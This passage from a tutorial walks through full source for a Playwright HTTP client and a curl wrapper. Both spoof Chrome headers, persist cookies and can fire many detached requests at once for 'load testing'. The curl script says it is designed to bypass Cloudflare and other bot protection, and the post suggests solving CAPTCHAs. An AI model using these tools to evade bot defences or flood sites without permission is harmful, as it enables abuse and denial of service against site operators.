  -o, --output FILE          Write response body to file
  -c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
  -A, --user-agent UA        Custom User-Agent
  -t, --timeout SECONDS      Request timeout [default: 30]
      --async                Run request(s) in background
      --count N              Number of async requests to fire [default: 1, requires --async]
      --no-redirect          Do not follow redirects (best-effort)
      --show-headers         Print response headers
      --json                 Send data as JSON (sets Content-Type)
      --form                 Send data as application/x-www-form-urlencoded
  -v, --verbose              Verbose output
  -h, --help                 Show this help message
EXAMPLES:
  ${b} https://example.com
  ${b} --async https://example.com
  ${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
  ${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
  const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
  for (let i = 0; i < argv.length; i++) {
    const a = argv[i];
    switch (a) {
      case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
      case '-d': case '--data': args.data = String(argv[++i] || ''); break;
      case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
      case '-o': case '--output': args.output = String(argv[++i] || ''); break;
      case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
      case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
      case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
      case '--async': args.async = true; break;
      case '--count': args.count = Number(argv[++i] || '1'); break;
      case '--no-redirect': args.followRedirects = false; break;
      case '--show-headers': args.showHeaders = true; break;
      case '--json': args.contentType = 'application/json'; break;
      case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
      case '-v': case '--verbose': args.verbose = true; break;
      case '-h': case '--help': usage(); process.exit(0);
      default:
        if (!args.url && !a.startsWith('-')) args.url = a; else {
          console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
          process.exit(1);
        }
    }
  }
  return args;
}
function parseHeaderList(list) {
  const out = {};
  for (const h of list) {
    const idx = h.indexOf(':');
    if (idx === -1) continue;
    const name = h.slice(0, idx).trim();
    const value = h.slice(idx + 1).trim();
    if (!name) continue;
    out[name] = value;
  }
  return out;
}
function buildDefaultHeaders(userAgent) {
  const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
  return {
    'User-Agent': ua,
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-User': '?1',
    'Cache-Control': 'max-age=0'
  };
}
async function performRequest(opts) {
  // Cookie file handling
  const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
  const cookieFile = opts.cookieFile || defaultCookie;
  // Launch Chromium
  const browser = await chromium.launch({ headless: true });
  const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
  if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
  const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
  // Load cookies if present
  if (fs.existsSync(cookieFile)) {
    try {
      const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
      if (ss.cookies?.length) await context.addCookies(ss.cookies);
    } catch {}
  }
  const request = context.request;
  // Build request options
  const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
  if (opts.data) {
    // Playwright will detect JSON strings vs form strings by headers
    reqOpts.data = opts.data;
  }
  if (opts.followRedirects === false) {
    // Best-effort: limit redirects to 0
    reqOpts.maxRedirects = 0;
  }
  const method = opts.method.toUpperCase();
  let resp;
  try {
    if (method === 'GET') resp = await request.get(opts.url, reqOpts);
    else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
    else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
    else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
    else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
    else {
      console.error(`${RED}Unsupported method: ${method}${NC}`);
      await browser.close();
      process.exit(2);
    }
  } catch (e) {
    console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
    await browser.close();
    process.exit(3);
  }
  // Persist cookies
  try {
    const state = await context.storageState();
    fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
  } catch {}
  // Output
  const status = resp.status();
  const statusText = resp.statusText();
  const headers = await resp.headers();
  const body = await resp.text();
  if (opts.verbose) {
    console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
    console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
  }
  if (opts.showHeaders) {
    // Print a simple status line and headers to stdout before body
    console.log(`HTTP ${status} ${statusText}`);
    for (const [k, v] of Object.entries(headers)) {
      console.log(`${k}: ${v}`);
    }
    console.log('');
  }
  if (opts.output) {
    fs.writeFileSync(opts.output, body);
  } else {
    process.stdout.write(body);
  }
  if (!resp.ok()) {
    console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
    await browser.close();
    process.exit(4);
  }
  await browser.close();
}
async function main() {
  const argv = process.argv.slice(2);
  const opts = parseArgs(argv);
  if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
  if ((opts.count || 1) > 1 && !opts.async) {
    console.error(`${RED}Error: --count requires --async${NC}`);
    process.exit(1);
  }
  if (opts.count < 1 || !Number.isInteger(opts.count)) {
    console.error(`${RED}Error: --count must be a positive integer${NC}`);
    process.exit(1);
  }
  if (opts.async) {
    // Fire-and-forget background processes
    // Strip --async and --count <N> (value included) so each child runs a single synchronous request
    const raw = process.argv.slice(2);
    const baseArgs = [];
    for (let i = 0; i < raw.length; i++) {
      if (raw[i] === '--async') continue;
      if (raw[i] === '--count') { i++; continue; }
      baseArgs.push(raw[i]);
    }
    const pids = [];
    for (let i = 0; i < opts.count; i++) {
      const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
      pids.push(child.pid);
      child.unref();
    }
    if (opts.verbose) {
      console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
    }
    if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
    else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
    process.exit(0);
  }
  await performRequest(opts);
}
main().catch(err => {
  console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
  process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH:

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
  -d "username=user&password=pass" \
  https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
  https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
  node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
  ((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.
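
You can verify what actually goes over the wire by hitting an echo endpoint (httpbin reflects the request headers back as JSON):

node browser_playwright.mjs https://httpbin.org/headers | jq '.headers'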

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=user&pass=pass" \
  "$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  "$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  --async --count 20 \
  "$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
  "https://example.com/"
  "https://example.com/"
  "https://example.com/"
)
for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
  sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
  if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

Troubleshooting

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.
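
A rough way to measure dispatch overhead on your own machine (numbers vary widely with hardware and Node startup time):

time node browser_playwright.mjs --async --count 20 https://httpbin.org/get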

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o','--output')
    p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('--show-headers', action='store_true')
    p.add_argument('-t','--timeout', type=int, default=30)
    p.add_argument('-A','--user-agent')
    p.add_argument('-v','--verbose', action='store_true')
    return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
        cookies = driver.get_cookies()
        json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
    except Exception:
        pass
    if args.output:
        open(args.output, 'w').write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.


Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash

# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false

# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

usage() {
    cat << EOH
Usage: $(basename "$0") [OPTIONS] URL

Advanced curl wrapper that mimics browser behavior to bypass bot protection.

OPTIONS:
    -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
    -d, --data DATA           POST/PUT data
    -H, --header HEADER       Add custom header (can be used multiple times)
    -o, --output FILE         Write output to file
    -c, --cookie FILE         Use custom cookie file [default: temp file]
    -A, --user-agent UA       Custom user agent [default: Chrome on macOS]
    -t, --timeout SECONDS     Request timeout [default: 30]
    --async                   Run request asynchronously in background
    --count N                 Number of async requests to fire [default: 1, requires --async]
    --no-redirect             Don't follow redirects
    --show-headers            Show response headers
    --json                    Send data as JSON (sets Content-Type)
    --form                    Send data as form-urlencoded
    -v, --verbose             Verbose output
    -h, --help                Show this help message

EXAMPLES:
    # Simple GET request
    $(basename "$0") https://example.com

    # Async GET request
    $(basename "$0") --async https://example.com

    # POST with JSON data
    $(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login

    # POST with form data
    $(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login

    # Multiple async requests (using loop)
    for i in {1..10}; do
        $(basename "$0") --async https://example.com/api/endpoint
    done

    # Multiple async requests (using --count)
    $(basename "$0") --async --count 10 https://example.com/api/endpoint

EOH
    exit 0
}

# Parse arguments
EXTRA_HEADERS=()
URL=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -X|--method)
            METHOD="$2"
            shift 2
            ;;
        -d|--data)
            DATA="$2"
            shift 2
            ;;
        -H|--header)
            EXTRA_HEADERS+=("$2")
            shift 2
            ;;
        -o|--output)
            OUTPUT_FILE="$2"
            shift 2
            ;;
        -c|--cookie)
            COOKIE_FILE="$2"
            shift 2
            ;;
        -A|--user-agent)
            USER_AGENT="$2"
            shift 2
            ;;
        -t|--timeout)
            TIMEOUT="$2"
            shift 2
            ;;
        --async)
            ASYNC=true
            shift
            ;;
        --count)
            COUNT="$2"
            shift 2
            ;;
        --no-redirect)
            FOLLOW_REDIRECTS=false
            shift
            ;;
        --show-headers)
            SHOW_HEADERS=true
            shift
            ;;
        --json)
            CONTENT_TYPE="application/json"
            shift
            ;;
        --form)
            CONTENT_TYPE="application/x-www-form-urlencoded"
            shift
            ;;
        -v|--verbose)
            VERBOSE=true
            shift
            ;;
        -h|--help)
            usage
            ;;
        *)
            if [[ -z "$URL" ]]; then
                URL="$1"
            else
                echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
                exit 1
            fi
            shift
            ;;
    esac
done

# Validate URL
if [[ -z "$URL" ]]; then
    echo -e "${RED}Error: URL is required${NC}" >&2
    usage
fi

# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
    echo -e "${RED}Error: --count requires --async${NC}" >&2
    exit 1
fi

if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
    echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
    exit 1
fi

# Execute curl
execute_curl() {
    # Build curl arguments as array instead of string
    local -a curl_args=()
    
    # Basic options
    curl_args+=("--compressed")
    curl_args+=("--max-time" "$TIMEOUT")
    curl_args+=("--connect-timeout" "10")
    curl_args+=("--http2")
    
    # Cookies (create the cookie file only if missing, so saved sessions persist across runs)
    [[ -f "$COOKIE_FILE" ]] || : > "$COOKIE_FILE" 2>/dev/null || true
    curl_args+=("--cookie" "$COOKIE_FILE")
    curl_args+=("--cookie-jar" "$COOKIE_FILE")
    
    # Follow redirects
    if [[ "$FOLLOW_REDIRECTS" == true ]]; then
        curl_args+=("--location")
    fi
    
    # Show headers
    if [[ "$SHOW_HEADERS" == true ]]; then
        curl_args+=("--include")
    fi
    
    # Output file
    if [[ -n "$OUTPUT_FILE" ]]; then
        curl_args+=("--output" "$OUTPUT_FILE")
    fi
    
    # Verbose
    if [[ "$VERBOSE" == true ]]; then
        curl_args+=("--verbose")
    else
        curl_args+=("--silent" "--show-error")
    fi
    
    # Method
    curl_args+=("--request" "$METHOD")
    
    # Browser-like headers
    curl_args+=("--header" "User-Agent: $USER_AGENT")
    curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
    curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
    curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
    curl_args+=("--header" "Connection: keep-alive")
    curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
    curl_args+=("--header" "Sec-Fetch-Dest: document")
    curl_args+=("--header" "Sec-Fetch-Mode: navigate")
    curl_args+=("--header" "Sec-Fetch-Site: none")
    curl_args+=("--header" "Sec-Fetch-User: ?1")
    curl_args+=("--header" "Cache-Control: max-age=0")
    
    # Content-Type for POST/PUT
    if [[ -n "$DATA" ]]; then
        if [[ -n "$CONTENT_TYPE" ]]; then
            curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
        fi
        curl_args+=("--data" "$DATA")
    fi
    
    # Extra headers
    for header in "${EXTRA_HEADERS[@]}"; do
        curl_args+=("--header" "$header")
    done
    
    # URL
    curl_args+=("$URL")
    
    if [[ "$ASYNC" == true ]]; then
        # Run asynchronously in background
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        # Fire multiple requests if count > 1
        local pids=()
        for ((i=1; i<=COUNT; i++)); do
            # Run in background detached, suppress all output
            nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
            local pid=$!
            disown $pid
            pids+=("$pid")
        done
        
        if [[ "$COUNT" -eq 1 ]]; then
            echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
        else
            echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
        fi
    else
        # Run synchronously
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        curl "${curl_args[@]}"
        local exit_code=$?
        
        if [[ $exit_code -ne 0 ]]; then
            echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
            return $exit_code
        fi
    fi
}

# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
    if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
        rm -f "$COOKIE_FILE"
    fi
}

# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
    trap cleanup EXIT
fi

# Main execution
execute_curl

# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
    exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
  -d "username=user&password=pass" \
  https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"

# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://example.com/login

# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  https://example.com/dashboard

Load testing patterns

Simple load test with --count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
  ./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0

END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  ./browser_curl.sh --async "$URL" > /dev/null 2>&1
  ((COUNT++))
done

echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"

echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""

START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

  • -X, --method        HTTP method (GET/POST/PUT/DELETE) [default: GET]
  • -d, --data          Request body (JSON or form)
  • -H, --header        Add extra headers (repeatable)
  • -o, --output        Write response to a file [default: stdout]
  • -c, --cookie        Cookie file to use (and persist) [default: temp file]
  • -A, --user-agent    Override User-Agent [default: Chrome/macOS]
  • -t, --timeout       Max request time in seconds [default: 30]
  • --async             Run request(s) in the background [default: false]
  • --count N           Fire N async requests (requires --async) [default: 1]
  • --no-redirect       Don't follow redirects [default: follows]
  • --show-headers      Include response headers [default: false]
  • --json              Sets Content-Type: application/json
  • --form              Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose       Verbose diagnostics [default: false]
  • -h, --help          Show usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior
  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.
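
As with the Playwright version, an echo endpoint confirms which headers the server actually received:

./browser_curl.sh https://httpbin.org/headers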

Real-world examples

Example 1: API authentication flow

cat > test_auth.sh << 'SCRIPT'
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"

echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  "$API_BASE/auth/login" > /dev/null

echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .

echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"

echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
  "https://example.com/page1"
  "https://example.com/page2"
  "https://example.com/page3"
)

for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  ./browser_curl.sh -o "$(basename "$url").html" "$url"
  sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"

while true; do
  if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available from anywhere, install it on your PATH:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ./browser_curl.sh ~/.local/bin/browser_curl

echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
  echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc

echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc

echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

